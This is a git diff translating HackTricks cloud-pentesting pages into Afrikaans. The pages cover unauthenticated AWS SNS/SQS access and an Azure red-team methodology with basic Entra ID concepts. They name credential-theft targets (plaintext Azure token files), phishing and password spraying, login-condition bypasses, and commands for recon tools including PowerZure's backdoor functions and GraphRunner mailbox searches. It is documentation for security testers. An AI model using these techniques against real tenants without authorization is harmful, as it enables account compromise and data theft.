+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md
@@ -4,22 +4,18 @@
 
 ## SNS
 
-For more information about SNS check:
+Vir meer inligting oor SNS, kyk:
 
 {{#ref}}
 ../aws-services/aws-sns-enum.md
 {{#endref}}
 
-### Open to All
+### Oop vir Alle
 
-When you configure a SNS topic from the web console it's possible to indicate that **Everyone can publish and subscribe** to the topic:
+Wanneer jy 'n SNS-tema vanaf die webkonsol konfigureer, is dit moontlik om aan te dui dat **Enigeen kan publiseer en inteken** op die tema:
 
 <figure><img src="../../../images/image (212).png" alt=""><figcaption></figcaption></figure>
 
-So if you **find the ARN of topics** inside the account (or brute forcing potential names for topics) you can **check** if you can **publish** or **subscribe** to **them**.
+So as jy **die ARN van temas** binne die rekening **vind** (of potensiële name vir temas brute force), kan jy **kontroleer** of jy kan **publiseer** of **inteken** op **hulle**.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md
index a5006a63b..2c7a3d634 100644
--- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md
@@ -4,24 +4,18 @@
 
 ## SQS
 
-For more information about SQS check:
+Vir meer inligting oor SQS, kyk:
 
 {{#ref}}
 ../aws-services/aws-sqs-and-sns-enum.md
 {{#endref}}
 
-### Public URL template
-
+### Publieke URL-sjabloon
 ```
 https://sqs.[region].amazonaws.com/[account-id]/{user_provided}
 ```
+### Kontroleer Toestemmings
 
-### Check Permissions
-
-It's possible to misconfigure a SQS queue policy and grant permissions to everyone in AWS to send and receive messages, so if you get the ARN of queues try if you can access them.
+Dit is moontlik om 'n SQS-rybeleid verkeerd te konfigureer en toestemmings aan almal in AWS te gee om boodskappe te stuur en te ontvang, so as jy die ARN van rye kry, probeer of jy toegang daartoe kan kry.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/azure-security/README.md b/src/pentesting-cloud/azure-security/README.md
index 9d2de65fc..01cc8a3fa 100644
--- a/src/pentesting-cloud/azure-security/README.md
+++ b/src/pentesting-cloud/azure-security/README.md
@@ -2,86 +2,85 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Basic Information
+## Basiese Inligting
 
 {{#ref}}
 az-basic-information/
 {{#endref}}
 
-## Azure Pentester/Red Team Methodology
+## Azure Pentester/Red Team Metodologie
 
-In order to audit an AZURE environment it's very important to know: which **services are being used**, what is **being exposed**, who has **access** to what, and how are internal Azure services and **external services** connected.
+Om 'n AZURE omgewing te oudit, is dit baie belangrik om te weet: watter **dienste gebruik word**, wat is **blootgestel**, wie het **toegang** tot wat, en hoe is interne Azure dienste en **eksterne dienste** gekoppel.
 
-From a Red Team point of view, the **first step to compromise an Azure environment** is to manage to obtain some **credentials** for Azure AD. Here you have some ideas on how to do that:
+Vanuit 'n Red Team perspektief, is die **eerste stap om 'n Azure omgewing te kompromitteer** om daarin te slaag om 'n paar **bewyse** vir Azure AD te verkry. Hier is 'n paar idees oor hoe om dit te doen:
 
-- **Leaks** in github (or similar) - OSINT
-- **Social** Engineering
-- **Password** reuse (password leaks)
-- Vulnerabilities in Azure-Hosted Applications
-  - [**Server Side Request Forgery**](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf) with access to metadata endpoint
-  - **Local File Read**
-    - `/home/USERNAME/.azure`
-    - `C:\Users\USERNAME\.azure`
-    - The file **`accessTokens.json`** in `az cli` before 2.30 - Jan2022 - stored **access tokens in clear text**
-    - The file **`azureProfile.json`** contains **info** about logged user.
-    - **`az logout`** removes the token.
-    - Older versions of **`Az PowerShell`** stored **access tokens** in **clear** text in **`TokenCache.dat`**. It also stores **ServicePrincipalSecret** in **clear**-text in **`AzureRmContext.json`**. The cmdlet **`Save-AzContext`** can be used to **store** **tokens**.\
-      Use `Disconnect-AzAccount` to remove them.
-- 3rd parties **breached**
-- **Internal** Employee
-- [**Common Phishing**](https://book.hacktricks.xyz/generic-methodologies-and-resources/phishing-methodology) (credentials or Oauth App)
-  - [Device Code Authentication Phishing](az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md)
-- [Azure **Password Spraying**](az-unauthenticated-enum-and-initial-entry/az-password-spraying.md)
+- **Lekke** in github (of soortgelyk) - OSINT
+- **Sosiale** Ingenieurswese
+- **Wagwoord** hergebruik (wagwoordlekke)
+- Kwesbaarhede in Azure-gehoste toepassings
+- [**Server Side Request Forgery**](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf) met toegang tot metadata-eindpunt
+- **Plaaslike Lêer Lees**
+- `/home/USERNAME/.azure`
+- `C:\Users\USERNAME\.azure`
+- Die lêer **`accessTokens.json`** in `az cli` voor 2.30 - Jan2022 - gestoor **toegangstokens in duidelike teks**
+- Die lêer **`azureProfile.json`** bevat **inligting** oor die ingelogde gebruiker.
+- **`az logout`** verwyder die token.
+- Ou weergawe van **`Az PowerShell`** het **toegangstokens** in **duidelike** teks in **`TokenCache.dat`** gestoor. Dit stoor ook **ServicePrincipalSecret** in **duidelike** teks in **`AzureRmContext.json`**. Die cmdlet **`Save-AzContext`** kan gebruik word om **tokens** te **stoor**.\
+Gebruik `Disconnect-AzAccount` om hulle te verwyder.
+- 3de partye **gekompromitteer**
+- **Interne** Werknemer
+- [**Algemene Phishing**](https://book.hacktricks.xyz/generic-methodologies-and-resources/phishing-methodology) (bewyse of Oauth App)
+- [Toestelkode Verifikasie Phishing](az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md)
+- [Azure **Wagwoord Spuit**](az-unauthenticated-enum-and-initial-entry/az-password-spraying.md)
 
-Even if you **haven't compromised any user** inside the Azure tenant you are attacking, you can **gather some information** from it:
+Selfs as jy **nie enige gebruiker** binne die Azure tenant wat jy aanval, gecompromitteer het nie, kan jy **'n paar inligting** daaruit versamel:
 
 {{#ref}}
 az-unauthenticated-enum-and-initial-entry/
 {{#endref}}
 
 > [!NOTE]
-> After you have managed to obtain credentials, you need to know **to who do those creds belong**, and **what they have access to**, so you need to perform some basic enumeration:
+> Nadat jy daarin geslaag het om bewese te verkry, moet jy weet **aan wie behoort daardie bewese**, en **waartoe hulle toegang het**, so jy moet 'n paar basiese enumerasie uitvoer:
 
-## Basic Enumeration
+## Basiese Enumerasie
 
 > [!NOTE]
-> Remember that the **noisiest** part of the enumeration is the **login**, not the enumeration itself.
+> Onthou dat die **luidste** deel van die enumerasie die **inlog** is, nie die enumerasie self nie.
 
 ### SSRF
 
-If you found a SSRF in a machine inside Azure check this page for tricks:
+As jy 'n SSRF in 'n masjien binne Azure gevind het, kyk hierdie bladsy vir truuks:
 
 {{#ref}}
 https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf
 {{#endref}}
 
-### Bypass Login Conditions
+### Bypass Inlog Voorwaardes
 
 <figure><img src="../../images/image (268).png" alt=""><figcaption></figcaption></figure>
 
-In cases where you have some valid credentials but you cannot login, these are some common protections that could be in place:
+In gevalle waar jy 'n paar geldige bewese het maar jy kan nie inlog nie, is dit 'n paar algemene beskermings wat in plek kan wees:
 
-- **IP whitelisting** -- You need to compromise a valid IP
-- **Geo restrictions** -- Find where the user lives or where are the offices of the company and get a IP from the same city (or contry at least)
-- **Browser** -- Maybe only a browser from certain OS (Windows, Linux, Mac, Android, iOS) is allowed. Find out which OS the victim/company uses.
-- You can also try to **compromise Service Principal credentials** as they usually are less limited and its login is less reviewed
+- **IP witlys** -- Jy moet 'n geldige IP kompromitteer
+- **Geo beperkings** -- Vind waar die gebruiker woon of waar die kantore van die maatskappy is en kry 'n IP van dieselfde stad (of land ten minste)
+- **Blaaier** -- Miskien is slegs 'n blaaier van sekere OS (Windows, Linux, Mac, Android, iOS) toegelaat. Vind uit watter OS die slagoffer/maatskappy gebruik.
+- Jy kan ook probeer om **Service Principal bewese** te kompromitteer aangesien hulle gewoonlik minder beperk is en hul inlog minder nagegaan word.
 
-After bypassing it, you might be able to get back to your initial setup and you will still have access.
+Nadat jy dit omseil het, mag jy in staat wees om terug te keer na jou aanvanklike opstelling en jy sal steeds toegang hê.
 
-### Subdomain Takeover
+### Subdomein Oorname
 
 - [https://godiego.co/posts/STO-Azure/](https://godiego.co/posts/STO-Azure/)
 
 ### Whoami
 
 > [!CAUTION]
-> Learn **how to install** az cli, AzureAD and Az PowerShell in the [**Az - Entra ID**](az-services/az-azuread.md) section.
+> Leer **hoe om** az cli, AzureAD en Az PowerShell in die [**Az - Entra ID**](az-services/az-azuread.md) afdeling te installeer.
 
-One of the first things you need to know is **who you are** (in which environment you are):
+Een van die eerste dinge wat jy moet weet is **wie jy is** (in watter omgewing jy is):
 
 {{#tabs }}
 {{#tab name="az cli" }}
-
 ```bash
 az account list
 az account tenant list # Current tenant info
@@ -90,22 +89,18 @@ az ad signed-in-user show # Current signed-in user
 az ad signed-in-user list-owned-objects # Get owned objects by current user
 az account management-group list #Not allowed by default
 ```
-
 {{#endtab }}
 
 {{#tab name="AzureAD" }}
-
 ```powershell
 #Get the current session state
 Get-AzureADCurrentSessionInfo
 #Get details of the current tenant
 Get-AzureADTenantDetail
 ```
-
 {{#endtab }}
 
 {{#tab name="Az PowerShell" }}
-
 ```powershell
 # Get the information about the current context (Account, Tenant, Subscription etc.)
 Get-AzContext
@@ -121,53 +116,49 @@ Get-AzResource
 Get-AzRoleAssignment # For all users
 Get-AzRoleAssignment -SignInName test@corp.onmicrosoft.com # For current user
 ```
-
 {{#endtab }}
 {{#endtabs }}
 
 > [!CAUTION]
-> Oone of the most important commands to enumerate Azure is **`Get-AzResource`** from Az PowerShell as it lets you **know the resources your current user has visibility over**.
+> Een van die belangrikste opdragte om Azure te enumerate is **`Get-AzResource`** van Az PowerShell, aangesien dit jou **inligting gee oor die hulpbronne wat jou huidige gebruiker kan sien**.
 >
-> You can get the same info in the **web console** going to [https://portal.azure.com/#view/HubsExtension/BrowseAll](https://portal.azure.com/#view/HubsExtension/BrowseAll) or searching for "All resources"
+> Jy kan dieselfde inligting in die **webkonsol** kry deur na [https://portal.azure.com/#view/HubsExtension/BrowseAll](https://portal.azure.com/#view/HubsExtension/BrowseAll) te gaan of te soek na "Alle hulpbronne"
 
 ### ENtra ID Enumeration
 
-By default, any user should have **enough permissions to enumerate** things such us, users, groups, roles, service principals... (check [default AzureAD permissions](az-basic-information/#default-user-permissions)).\
-You can find here a guide:
+Standaard behoort enige gebruiker **voldoende regte te hê om** dinge soos gebruikers, groepe, rolle, diensprincipals... te enumerate (kyk [standaard AzureAD regte](az-basic-information/#default-user-permissions)).\
+Jy kan hier 'n gids vind:
 
 {{#ref}}
 az-services/az-azuread.md
 {{#endref}}
 
 > [!NOTE]
-> Now that you **have some information about your credentials** (and if you are a red team hopefully you **haven't been detected**). It's time to figure out which services are being used in the environment.\
-> In the following section you can check some ways to **enumerate some common services.**
+> Nou dat jy **'n bietjie inligting oor jou akrediteerings het** (en as jy 'n rooi span is, hoop ek jy **is nie opgespoor nie**). Dit is tyd om uit te vind watter dienste in die omgewing gebruik word.\
+> In die volgende afdeling kan jy 'n paar maniere kyk om **'n paar algemene dienste te enumerate.**
 
 ## App Service SCM
 
-Kudu console to log in to the App Service 'container'.
+Kudu-konsol om in te log in die App Service 'houer'.
 
 ## Webshell
 
-Use portal.azure.com and select the shell, or use shell.azure.com, for a bash or powershell. The 'disk' of this shell are stored as an image file in a storage-account.
+Gebruik portal.azure.com en kies die shell, of gebruik shell.azure.com, vir 'n bash of powershell. Die 'skyf' van hierdie shell word as 'n beeldlêer in 'n stoorrekening gestoor.
 
 ## Azure DevOps
 
-Azure DevOps is separate from Azure. It has repositories, pipelines (yaml or release), boards, wiki, and more. Variable Groups are used to store variable values and secrets.
+Azure DevOps is apart van Azure. Dit het repositories, pipelines (yaml of release), borde, wiki, en meer. Veranderlike Groepe word gebruik om veranderlike waardes en geheime te stoor.
 
 ## Debug | MitM az cli
 
-Using the parameter **`--debug`** it's possible to see all the requests the tool **`az`** is sending:
-
+Deur die parameter **`--debug`** te gebruik, is dit moontlik om al die versoeke wat die hulpmiddel **`az`** stuur, te sien:
 ```bash
 az account management-group list --output table --debug
 ```
-
-In order to do a **MitM** to the tool and **check all the requests** it's sending manually you can do:
+Om 'n **MitM** na die hulpmiddel te doen en **al die versoeke** wat dit handmatig stuur te kontroleer, kan jy doen:
 
 {{#tabs }}
 {{#tab name="Bash" }}
-
 ```bash
 export ADAL_PYTHON_SSL_NO_VERIFY=1
 export AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=1
@@ -180,25 +171,21 @@ export HTTP_PROXY="http://127.0.0.1:8080"
 openssl x509 -in ~/Downloads/cacert.der -inform DER -out ~/Downloads/cacert.pem -outform PEM
 export REQUESTS_CA_BUNDLE=/Users/user/Downloads/cacert.pem
 ```
-
 {{#endtab }}
 
 {{#tab name="PS" }}
-
 ```bash
 $env:ADAL_PYTHON_SSL_NO_VERIFY=1
 $env:AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=1
 $env:HTTPS_PROXY="http://127.0.0.1:8080"
 $env:HTTP_PROXY="http://127.0.0.1:8080"
 ```
-
 {{#endtab }}
 {{#endtabs }}
 
-## Automated Recon Tools
+## Geoutomatiseerde Verkenning Gereedskap
 
 ### [**ROADRecon**](https://github.com/dirkjanm/ROADtools)
-
 ```powershell
 cd ROADTools
 pipenv shell
@@ -206,9 +193,7 @@ roadrecon auth -u test@corp.onmicrosoft.com -p "Welcome2022!"
 roadrecon gather
 roadrecon gui
 ```
-
 ### [Monkey365](https://github.com/silverhack/monkey365)
-
 ```powershell
 Import-Module monkey365
 Get-Help Invoke-Monkey365
@@ -216,9 +201,7 @@ Get-Help Invoke-Monkey365 -Detailed
 Invoke-Monkey365 -IncludeEntraID -ExportTo HTML -Verbose -Debug -InformationAction Continue
 Invoke-Monkey365 - Instance Azure -Analysis All -ExportTo HTML
 ```
-
 ### [**Stormspotter**](https://github.com/Azure/Stormspotter)
-
 ```powershell
 # Start Backend
 cd stormspotter\backend\
@@ -236,9 +219,7 @@ az login -u test@corp.onmicrosoft.com -p Welcome2022!
 python stormspotter\stormcollector\sscollector.pyz cli
 # This will generate a .zip file to upload in the frontend (127.0.0.1:9091)
 ```
-
 ### [**AzureHound**](https://github.com/BloodHoundAD/AzureHound)
-
 ```powershell
 # You need to use the Az PowerShell and Azure AD modules:
 $passwd = ConvertTo-SecureString "Welcome2022!" -AsPlainText -Force
@@ -294,9 +275,7 @@ MATCH  p=(m:User)-[r:AZResetPassword|AZOwns|AZUserAccessAdministrator|AZContribu
 ## All Azure AD Groups that are synchronized with On-Premise AD
 MATCH (n:Group) WHERE n.objectid CONTAINS 'S-1-5' AND n.azsyncid IS NOT NULL RETURN n
 ```
-
 ### [Azucar](https://github.com/nccgroup/azucar)
-
 ```bash
 # You should use an account with at least read-permission on the assets you want to access
 git clone https://github.com/nccgroup/azucar.git
@@ -309,17 +288,13 @@ PS> .\Azucar.ps1 -ExportTo CSV,JSON,XML,EXCEL -AuthMode Certificate_Credentials
 # resolve the TenantID for an specific username
 PS> .\Azucar.ps1 -ResolveTenantUserName user@company.com
 ```
-
 ### [**MicroBurst**](https://github.com/NetSPI/MicroBurst)
-
 ```
 Import-Module .\MicroBurst.psm1
 Import-Module .\Get-AzureDomainInfo.ps1
 Get-AzureDomainInfo -folder MicroBurst -Verbose
 ```
-
 ### [**PowerZure**](https://github.com/hausec/PowerZure)
-
 ```powershell
 Connect-AzAccount
 ipmo C:\Path\To\Powerzure.psd1
@@ -340,9 +315,7 @@ $ Set-Role -Role Contributor -User test@contoso.com -Resource Win10VMTest
 # Administrator
 $ Create-Backdoor, Execute-Backdoor
 ```
-
 ### [**GraphRunner**](https://github.com/dafthack/GraphRunner/wiki/Invoke%E2%80%90GraphRunner)
-
 ```powershell
 
 #Get-GraphTokens
@@ -398,9 +371,4 @@ Get-TenantID -Domain
 #Runs Invoke-GraphRecon, Get-AzureADUsers, Get-SecurityGroups, Invoke-DumpCAPS, Invoke-DumpApps, and then uses the default_detectors.json file to search with Invoke-SearchMailbox, Invoke-SearchSharePointAndOneDrive, and Invoke-SearchTeams.
 Invoke-GraphRunner -Tokens $tokens
 ```
-
 {{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/azure-security/az-basic-information/README.md b/src/pentesting-cloud/azure-security/az-basic-information/README.md
index a600b66dc..20709f347 100644
--- a/src/pentesting-cloud/azure-security/az-basic-information/README.md
+++ b/src/pentesting-cloud/azure-security/az-basic-information/README.md
@@ -1,376 +1,372 @@
-# Az - Basic Information
+# Az - Basiese Inligting
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Organization Hierarchy
+## Organisasie Hiërargie
 
 <figure><img src="https://lh7-rt.googleusercontent.com/slidesz/AGV_vUcVrh1BpuQXN7RzGqoxrn-4Nm_sjdJU-dDTvshloB7UMQnN1mtH9N94zNiPCzOYAqE9EsJqlboZOj47tQsQktjxszpKvIDPZLs9rgyiObcZCvl7N0ZWztshR0ZddyBYZIAwPIkrEQ=s2048?key=l3Eei079oPmVJuh8lxQYxxrB" alt=""><figcaption><p><a href="https://www.tunecom.be/stg_ba12f/wp-content/uploads/2020/01/VDC-Governance-ManagementGroups-1536x716.png">https://www.tunecom.be/stg_ba12f/wp-content/uploads/2020/01/VDC-Governance-ManagementGroups-1536x716.png</a></p></figcaption></figure>
 
-### Management Groups
+### Bestuursgroepe
 
-- It can contain **other management groups or subscriptions**.
-- This allows to **apply governance controls** such as RBAC and Azure Policy once at the management group level and have them **inherited** by all the subscriptions in the group.
-- **10,000 management** groups can be supported in a single directory.
-- A management group tree can support **up to six levels of depth**. This limit doesn’t include the root level or the subscription level.
-- Each management group and subscription can support **only one parent**.
-- Even if several management groups can be created **there is only 1 root management group**.
-  - The root management group **contains** all the **other management groups and subscriptions** and **cannot be moved or deleted**.
-- All subscriptions within a single management group must trust the **same Entra ID tenant.**
+- Dit kan **ander bestuursgroepe of subskripsies** bevat.
+- Dit maak dit moontlik om **governance beheer** soos RBAC en Azure-beleid een keer op die bestuursgroepvlak toe te pas en dit **geërf** te laat word deur al die subskripsies in die groep.
+- **10,000 bestuurs** groepe kan in 'n enkele gids ondersteun word.
+- 'n Bestuursgroepboom kan **tot ses vlakke diepte** ondersteun. Hierdie limiet sluit nie die wortelvlak of die subskripsievlak in nie.
+- Elke bestuursgroep en subskripsie kan **slegs een ouer** ondersteun.
+- Alhoewel verskeie bestuursgroepe geskep kan word, is daar **slegs 1 wortel bestuursgroep**.
+- Die wortel bestuursgroep **bevat** al die **ander bestuursgroepe en subskripsies** en **kan nie verskuif of verwyder** word nie.
+- Alle subskripsies binne 'n enkele bestuursgroep moet die **dieselfde Entra ID huur** vertrou.
 
 <figure><img src="../../../images/image (147).png" alt=""><figcaption><p><a href="https://td-mainsite-cdn.tutorialsdojo.com/wp-content/uploads/2023/02/managementgroups-768x474.png">https://td-mainsite-cdn.tutorialsdojo.com/wp-content/uploads/2023/02/managementgroups-768x474.png</a></p></figcaption></figure>
 
-### Azure Subscriptions
+### Azure Subskripsies
 
-- It’s another **logical container where resources** (VMs, DBs…) can be run and will be billed.
-- Its **parent** is always a **management group** (and it can be the root management group) as subscriptions cannot contain other subscriptions.
-- It **trust only one Entra ID** directory
-- **Permissions** applied at the subscription level (or any of its parents) are **inherited** to all the resources inside the subscription
+- Dit is 'n ander **logiese houer waar hulpbronne** (VM's, DB's…) gedra kan word en gefaktureer sal word.
+- Sy **ouer** is altyd 'n **bestuursgroep** (en dit kan die wortel bestuursgroep wees) aangesien subskripsies nie ander subskripsies kan bevat nie.
+- Dit **vertrou slegs een Entra ID** gids
+- **Toestemmings** wat op die subskripsievlak (of enige van sy ouers) toegepas word, word **geërf** na al die hulpbronne binne die subskripsie
 
-### Resource Groups
+### Hulpbron Groepe
 
-[From the docs:](https://learn.microsoft.com/en-us/azure/azure-resource-manager/management/manage-resource-groups-python?tabs=macos#what-is-a-resource-group) A resource group is a **container** that holds **related resources** for an Azure solution. The resource group can include all the resources for the solution, or only those **resources that you want to manage as a group**. Generally, add **resources** that share the **same lifecycle** to the same resource group so you can easily deploy, update, and delete them as a group.
+[Van die dokumentasie:](https://learn.microsoft.com/en-us/azure/azure-resource-manager/management/manage-resource-groups-python?tabs=macos#what-is-a-resource-group) 'n Hulpbron groep is 'n **houer** wat **verwante hulpbronne** vir 'n Azure-oplossing bevat. Die hulpbron groep kan al die hulpbronne vir die oplossing insluit, of slegs daardie **hulpbronne wat jy as 'n groep wil bestuur**. Oor die algemeen, voeg **hulpbronne** wat die **selfde lewensiklus** deel by die selfde hulpbron groep sodat jy dit maklik kan ontplooi, opdateer, en verwyder as 'n groep.
 
-All the **resources** must be **inside a resource group** and can belong only to a group and if a resource group is deleted, all the resources inside it are also deleted.
+Alle **hulpbronne** moet **binne 'n hulpbron groep** wees en kan slegs aan een groep behoort, en as 'n hulpbron groep verwyder word, word al die hulpbronne daarin ook verwyder.
 
 <figure><img src="https://lh7-rt.googleusercontent.com/slidesz/AGV_vUfe8U30iP_vdZCvxX4g8nEPRLoo7v0kmCGkDn1frBPn3_GIoZ7VT2LkdsVQWCnrG_HSYNRRPM-1pSECUkbDAB-9YbUYLzpvKVLDETZS81CHWKYM4fDl3oMo5-yvTMnjdLTS2pz8U67xUTIzBhZ25MFMRkq5koKY=s2048?key=gSyKQr3HTyhvHa28Rf7LVA" alt=""><figcaption><p><a href="https://i0.wp.com/azuredays.com/wp-content/uploads/2020/05/org.png?resize=748%2C601&#x26;ssl=1">https://i0.wp.com/azuredays.com/wp-content/uploads/2020/05/org.png?resize=748%2C601&#x26;ssl=1</a></p></figcaption></figure>
 
-### Azure Resource IDs
+### Azure Hulpbron ID's
 
-Every resource in Azure has an Azure Resource ID that identifies it.
+Elke hulpbron in Azure het 'n Azure Hulpbron ID wat dit identifiseer.
 
-The format of an Azure Resource ID is as follows:
+Die formaat van 'n Azure Hulpbron ID is soos volg:
 
 - `/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}`
 
-For a virtual machine named myVM in a resource group `myResourceGroup` under subscription ID `12345678-1234-1234-1234-123456789012`, the Azure Resource ID looks like this:
+Vir 'n virtuele masjien genaamd myVM in 'n hulpbron groep `myResourceGroup` onder subskripsie ID `12345678-1234-1234-1234-123456789012`, lyk die Azure Hulpbron ID soos volg:
 
 - `/subscriptions/12345678-1234-1234-1234-123456789012/resourceGroups/myResourceGroup/providers/Microsoft.Compute/virtualMachines/myVM`
 
-## Azure vs Entra ID vs Azure AD Domain Services
+## Azure vs Entra ID vs Azure AD Domein Dienste
 
 ### Azure
 
-Azure is Microsoft’s comprehensive **cloud computing platform, offering a wide range of services**, including virtual machines, databases, artificial intelligence, and storage. It acts as the foundation for hosting and managing applications, building scalable infrastructures, and running modern workloads in the cloud. Azure provides tools for developers and IT professionals to create, deploy, and manage applications and services seamlessly, catering to a variety of needs from startups to large enterprises.
+Azure is Microsoft se omvattende **cloud computing platform, wat 'n wye reeks dienste bied**, insluitend virtuele masjiene, databasisse, kunsmatige intelligensie, en stoor. Dit dien as die grondslag vir die gasheer en bestuur van toepassings, die bou van skaalbare infrastruktuur, en die uitvoering van moderne werklas in die wolk. Azure bied gereedskap vir ontwikkelaars en IT-professionals om toepassings en dienste naatloos te skep, te ontplooi, en te bestuur, wat voorsien in 'n verskeidenheid behoeftes van startups tot groot ondernemings.
 
-### Entra ID (formerly Azure Active Directory)
+### Entra ID (voorheen Azure Aktiewe Gids)
 
-Entra ID is a cloud-based **identity and access management servic**e designed to handle authentication, authorization, and user access control. It powers secure access to Microsoft services such as Office 365, Azure, and many third-party SaaS applications. With features like single sign-on (SSO), multi-factor authentication (MFA), and conditional access policies among others.
+Entra ID is 'n wolk-gebaseerde **identiteit en toegang bestuur diens** wat ontwerp is om autentisering, autorisasie, en gebruikers toegang beheer te hanteer. Dit bied veilige toegang tot Microsoft dienste soos Office 365, Azure, en baie derdeparty SaaS toepassings. Met funksies soos enkel teken-in (SSO), multi-faktor autentisering (MFA), en voorwaardelike toegang beleid onder andere.
 
-### Entra Domain Services (formerly Azure AD DS)
+### Entra Domein Dienste (voorheen Azure AD DS)
 
-Entra Domain Services extends the capabilities of Entra ID by offering **managed domain services compatible with traditional Windows Active Directory environments**. It supports legacy protocols such as LDAP, Kerberos, and NTLM, allowing organizations to migrate or run older applications in the cloud without deploying on-premises domain controllers. This service also supports Group Policy for centralized management, making it suitable for scenarios where legacy or AD-based workloads need to coexist with modern cloud environments.
+Entra Domein Dienste brei die vermoëns van Entra ID uit deur **bestuurde domein dienste aan te bied wat versoenbaar is met tradisionele Windows Aktiewe Gids omgewings**. Dit ondersteun ouer protokolle soos LDAP, Kerberos, en NTLM, wat organisasies in staat stel om ouer toepassings in die wolk te migreer of te laat loop sonder om plaaslike domein kontrollers te ontplooi. Hierdie diens ondersteun ook Groep Beleid vir gesentraliseerde bestuur, wat dit geskik maak vir scenario's waar ouer of AD-gebaseerde werklas saam met moderne wolkomgewings moet bestaan.
 
 ## Entra ID Principals
 
-### Users
+### Gebruikers
 
-- **New users**
-  - Indicate email name and domain from selected tenant
-  - Indicate Display name
-  - Indicate password
-  - Indicate properties (first name, job title, contact info…)
-    - Default user type is “**member**”
-- **External users**
-  - Indicate email to invite and display name (can be a non Microsft email)
-  - Indicate properties
-    - Default user type is “**Guest**”
+- **Nuwe gebruikers**
+- Dui e-pos naam en domein van die geselekteerde huur aan
+- Dui Vertoonnaam aan
+- Dui wagwoord aan
+- Dui eienskappe aan (voornaam, posbeskrywing, kontakbesonderhede…)
+- Standaard gebruiker tipe is “**lid**”
+- **Buitelandse gebruikers**
+- Dui e-pos aan om uit te nooi en vertoonnaam (kan 'n nie-Microsoft e-pos wees)
+- Dui eienskappe aan
+- Standaard gebruiker tipe is “**Gaste**”
 
-### Members & Guests Default Permissions
+### Lede & Gaste Standaard Toestemmings
 
-You can check them in [https://learn.microsoft.com/en-us/entra/fundamentals/users-default-permissions](https://learn.microsoft.com/en-us/entra/fundamentals/users-default-permissions) but among other actions a member will be able to:
+Jy kan dit nagaan in [https://learn.microsoft.com/en-us/entra/fundamentals/users-default-permissions](https://learn.microsoft.com/en-us/entra/fundamentals/users-default-permissions) maar onder andere aksies sal 'n lid in staat wees om:
 
-- Read all users, Groups, Applications, Devices, Roles, Subscriptions, and their public properties
-- Invite Guests (_can be turned off_)
-- Create Security groups
-- Read non-hidden Group memberships
-- Add guests to Owned groups
-- Create new application (_can be turned off_)
-- Add up to 50 devices to Azure (_can be turned off_)
+- Lees alle gebruikers, Groepe, Toepassings, Toestelle, Rolle, Subskripsies, en hul publieke eienskappe
+- Nooi Gaste (_kan afgeskakel word_)
+- Skep Sekuriteitsgroepe
+- Lees nie-verborgene Groep lidmaatskappe
+- Voeg gaste by Besit groepe
+- Skep nuwe toepassing (_kan afgeskakel word_)
+- Voeg tot 50 toestelle by Azure (_kan afgeskakel word_)
 
 > [!NOTE]
-> Remember that to enumerate Azure resources the user needs an explicit grant of the permission.
+> Onthou dat om Azure hulpbronne te tel, die gebruiker 'n eksplisiete toekenning van die toestemming benodig.
 
-### Users Default Configurable Permissions
+### Gebruikers Standaard Konfigureerbare Toestemmings
 
-- **Members (**[**docs**](https://learn.microsoft.com/en-gb/entra/fundamentals/users-default-permissions#restrict-member-users-default-permissions)**)**
-  - Register Applications: Default **Yes**
-  - Restrict non-admin users from creating tenants: Default **No**
-  - Create security groups: Default **Yes**
-  - Restrict access to Microsoft Entra administration portal: Default **No**
-    - This doesn’t restrict API access to the portal (only web)
-  - Allow users to connect work or school account with LinkedIn: Default **Yes**
-  - Show keep user signed in: Default **Yes**
-  - Restrict users from recovering the BitLocker key(s) for their owned devices: Default No (check in Device Settings)
-  - Read other users: Default **Yes** (via Microsoft Graph)
-- **Guests**
-  - **Guest user access restrictions**
-    - **Guest users have the same access as members** grants all member user permissions to guest users by default.
-    - **Guest users have limited access to properties and memberships of directory objects (default)** restricts guest access to only their own user profile by default. Access to other users and group information is no longer allowed.
-    - **Guest user access is restricted to properties and memberships of their own directory objects** is the most restrictive one.
-  - **Guests can invite**
-    - **Anyone in the organization can invite guest users including guests and non-admins (most inclusive) - Default**
-    - **Member users and users assigned to specific admin roles can invite guest users including guests with member permissions**
-    - **Only users assigned to specific admin roles can invite guest users**
-    - **No one in the organization can invite guest users including admins (most restrictive)**
-  - **External user leave**: Default **True**
-    - Allow external users to leave the organization
+- **Lede (**[**dokumente**](https://learn.microsoft.com/en-gb/entra/fundamentals/users-default-permissions#restrict-member-users-default-permissions)**)**
+- Registreer Toepassings: Standaard **Ja**
+- Beperk nie-admin gebruikers van die skep van huurders: Standaard **Nee**
+- Skep sekuriteitsgroepe: Standaard **Ja**
+- Beperk toegang tot Microsoft Entra administrasie portaal: Standaard **Nee**
+- Dit beperk nie API toegang tot die portaal nie (slegs web)
+- Laat gebruikers toe om werk of skool rekening met LinkedIn te verbind: Standaard **Ja**
+- Toon hou gebruiker ingelog: Standaard **Ja**
+- Beperk gebruikers van die herstel van die BitLocker sleutel(s) vir hul besit toestelle: Standaard Nee (kyk in Toestel Instellings)
+- Lees ander gebruikers: Standaard **Ja** (deur Microsoft Graph)
+- **Gaste**
+- **Gaste gebruiker toegang beperkings**
